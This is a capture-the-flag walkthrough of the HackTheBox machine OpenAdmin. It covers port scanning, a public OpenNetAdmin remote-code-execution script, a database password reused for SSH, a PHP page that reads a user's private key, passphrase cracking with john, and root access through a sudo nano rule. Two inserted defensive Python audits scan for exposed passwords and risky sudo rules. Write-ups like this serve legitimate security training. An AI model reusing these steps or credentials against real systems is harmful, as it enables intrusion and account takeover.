Hackthebox OpenAdmin

This post provides a walkthrough of the OpenAdmin system on HackTheBox. It is an easy Linux machine.

nmap

nmap -A -T4 -oA openadmin 10.10.10.171 
Nmap scan report for 10.10.10.171 
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/30%OT=22%CT=1%CU=31355%PV=Y%DS=2%DC=I%G=Y%TM=5EAAB22
OS:5%P=x86_64-apple-darwin17.7.0)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)SE
OS:Q(SP=10B%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(SP=109%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O
OS:5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)ECN(R=N)T1(R=Y%DF=Y%
OS:T=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=N)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T5(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=N)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%CD=S)IE(R=N)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 30 14:10:29 2020 -- 1 IP address (1 host up) scanned in 107.10 seconds

The services are HTTP and SSH. The web server just has the default page. I ran dirbuster.

I saw the /ona/ directory. It looks like this.

The important thing here is OpenNetAdmin v18.1.1. I searched for OpenNetAdmin v18.1.1 exploits. I found this RCE and accessed the system.

~/Desktop/htb/openadmin » bash 47691.sh  http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -la
drwxrwxr-x 10 www-data www-data 4096 Nov 22 17:17 .
drwxr-x---  7 www-data www-data 4096 Nov 21 18:23 ..
-rw-rw-r--  1 www-data www-data 1970 Jan  3  2018 .htaccess.example
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 config
-rw-rw-r--  1 www-data www-data 1949 Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data 4160 Jan  3  2018 dcm.php
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 images
drwxrwxr-x  9 www-data www-data 4096 Jan  3  2018 include
-rw-rw-r--  1 www-data www-data 1999 Jan  3  2018 index.php
drwxrwxr-x  5 www-data www-data 4096 Jan  3  2018 local
-rw-rw-r--  1 www-data www-data 4526 Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data 1106 Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 modules
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 plugins
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data 4096 Jan  3  2018 workspace_plugins

This directory contained some important config files.

$ ls -la config/
total 24
drwxrwxr-x  2 www-data www-data 4096 Jan  3  2018 .
drwxrwxr-x 10 www-data www-data 4096 Nov 22 17:17 ..
-rw-rw-r--  1 www-data www-data 1905 Jan  3  2018 auth_ldap.config.php
-rw-rw-r--  1 www-data www-data 9983 Jan  3  2018 config.inc.php

config.inc.php contains some useful information.

// Include the localized Database settings                                               
$dbconffile = "{$base}/local/config/database_settings.inc.php";    

I found a password in local/config/database_settings.inc.php.

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
?>

We know the SSH port is open, and we know the users on the system. The SSH creds are jimmy:n1nj4W4rri0R!.

The www-data user didn't have access to the /var/www/internal/ folder, but jimmy does.

jimmy@openadmin:/var/www$ cd internal/
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php

main.php is interesting :)

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

The web server prints user joanna's RSA key. We can use curl.
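From the defender's side, both findings so far (the database password stored in database_settings.inc.php and the main.php page that shells out to read a private key) can be caught by a scan of the web root. The following is an added example, not code from the original post or from OpenNetAdmin; the rule names, the sample tree and its file modes are constructed, and the password is a placeholder.

```python
import os
import re
import stat
import tempfile

# Rules tied to the two findings in this post (names are this example's own).
RULES = {
    "hardcoded-db-password": re.compile(
        r"""['"]db_passwd['"]\s*=>\s*['"][^'"]+['"]"""),
    "php-shells-out-to-ssh-dir": re.compile(
        r"""\b(?:shell_exec|exec|system|passthru)\s*\(\s*['"][^'"]*\.ssh/"""),
}

def audit_webroot(root):
    """Return sorted (relative path, rule, readable_by_others) for PHP files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            others_read = bool(os.stat(path).st_mode & stat.S_IROTH)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for rule, pattern in RULES.items():
                if pattern.search(text):
                    findings.append((os.path.relpath(path, root), rule, others_read))
    return sorted(findings)

def build_sample(root):
    """Write a constructed tree shaped like the two files shown in the post."""
    samples = {
        "ona/local/config/database_settings.inc.php":
            ("<?php $ona_contexts=array('DEFAULT'=>array('databases'=>array(0=>array("
             "'db_login' => 'ona_sys', 'db_passwd' => 'PLACEHOLDER-NOT-REAL'))));", 0o664),
        "internal/main.php":
            ("<?php $output = shell_exec('cat /home/joanna/.ssh/id_rsa');", 0o640),
    }
    for rel, (body, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, rule, others_read in audit_webroot(tmp):
            print(f"{rel}: {rule} (readable by others: {others_read})")
```

A hit on the first rule is also a prompt to check that the stored value is not reused as any account's login password, which is what made the jimmy login possible here.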

We get a 404 Not Found. We can see the locally open ports with netstat.

When I tried port 52846, I got the RSA key.

Accessing as joanna. We can crack this key using john, but first we need to convert id_rsa into a format john can read. For this we use the ssh2john.py script.

 python /usr/share/john/ssh2john.py  id_rsa > hash
 john --wordlist=rockyou.txt hash

The john output looks like this.

The passphrase for key 'id_rsa' is bloodninjas. Access the box and get the user flag.

~/Desktop/htb/openadmin » ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 30 15:27:47 UTC 2020

  System load:  0.0               Processes:             115
  Usage of /:   49.6% of 7.81GB   Users logged in:       0
  Memory usage: 18%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Apr 30 13:59:42 2020 from 10.10.14.3
joanna@openadmin:~$ 

User Flag

Privilege Escalation

sudo -l lists which commands the user can run without a superuser password.

We can only run the preinstalled nano on a specific file, /opt/priv.

sudo -u root  /bin/nano /opt/priv 

nano has a handy command at the bottom for reading files.

We can read root.txt with this method.
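The root cause is a sudo rule that hands an interactive editor to another user: the file argument in the rule does not restrict which files the editor can open once it is running. As an added example (not from the original post), the audit below flags such rules in `sudo -l` output and proposes a sudoedit rule instead; the listing is constructed, and only the `/bin/nano /opt/priv` command comes from the page.

```python
import os
import re

# Interactive programs that can open other files or start commands from inside
# their own UI, so a fixed file argument in the rule does not confine them.
INTERACTIVE = {"nano", "pico", "vi", "vim", "view", "emacs", "ed", "less", "more", "man"}

# "(runas) TAG: TAG: command, command" as printed by `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

def audit_sudo_listing(listing):
    """Flag sudo rules that hand an interactive editor or pager to another user."""
    findings = []
    for line in listing.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            argv = cmd.split()
            if not argv or os.path.basename(argv[0]) not in INTERACTIVE:
                continue
            findings.append({
                "run_as": m["runas"].strip(),
                "command": cmd,
                "passwordless": "NOPASSWD" in tags,
                # sudoedit edits a temporary copy with the editor running as the
                # invoking user, so in-editor file reads are not privileged.
                "suggested_rule": "sudoedit " + " ".join(argv[1:]) if argv[1:] else None,
            })
    return findings

# Constructed listing: the post's own `sudo -l` output was a screenshot; only
# the /bin/nano /opt/priv command comes from the page.
SAMPLE = """\
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print(finding)
```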

Root Flag

This post is licensed under CC BY 4.0
